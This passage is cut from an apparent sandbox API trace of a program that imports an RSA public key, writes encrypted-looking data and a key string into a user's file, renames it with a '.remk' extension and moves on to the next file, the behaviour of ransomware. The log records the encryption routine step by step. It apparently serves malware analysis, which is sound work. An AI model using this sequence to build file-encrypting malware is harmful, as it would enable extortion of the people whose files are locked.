KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.745] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.746] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.746] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.746] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.747] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.747] GetLastError () returned 0x0 [0234.748] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.748] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.748] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.748] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.748] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xcf40) returned 0x37c4278 [0234.748] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c698 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8b0 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c6e0 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8c8 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee910 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.749] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee910 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee8f8 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.751] GetCurrentThreadId () returned 0x314 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3a30 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.751] GetCurrentThreadId () returned 0x314 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee910 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8e0 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee940 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee928 [0234.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee988 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee928 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8e0 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8c8 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c6e0 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.756] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0xcf32, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0xcf32, lpOverlapped=0x0) returned 1 [0234.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.757] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xcf37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.757] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.758] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.758] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.758] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.758] CloseHandle (hObject=0x640) returned 1 [0234.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0234.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0234.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0234.762] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\BP1P5M5rRgJVJ_zFpje.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\bp1p5m5rrgjvj_zfpje.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\BP1P5M5rRgJVJ_zFpje.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\bp1p5m5rrgjvj_zfpje.swf.remk")) returned 1 [0234.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.764] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.765] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806a4650, ftCreationTime.dwHighDateTime=0x1d5dde7, ftLastAccessTime.dwLowDateTime=0x6b18bf50, ftLastAccessTime.dwHighDateTime=0x1d5def7, ftLastWriteTime.dwLowDateTime=0x6b18bf50, ftLastWriteTime.dwHighDateTime=0x1d5def7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CSFg h-wcbKcac", cAlternateFileName="CSFGH-~1")) returned 1 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x6a7330 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695168 [0234.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0234.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6950e0 [0234.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694310 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37baab0 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e600 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694e38 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6570 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0234.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.766] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, 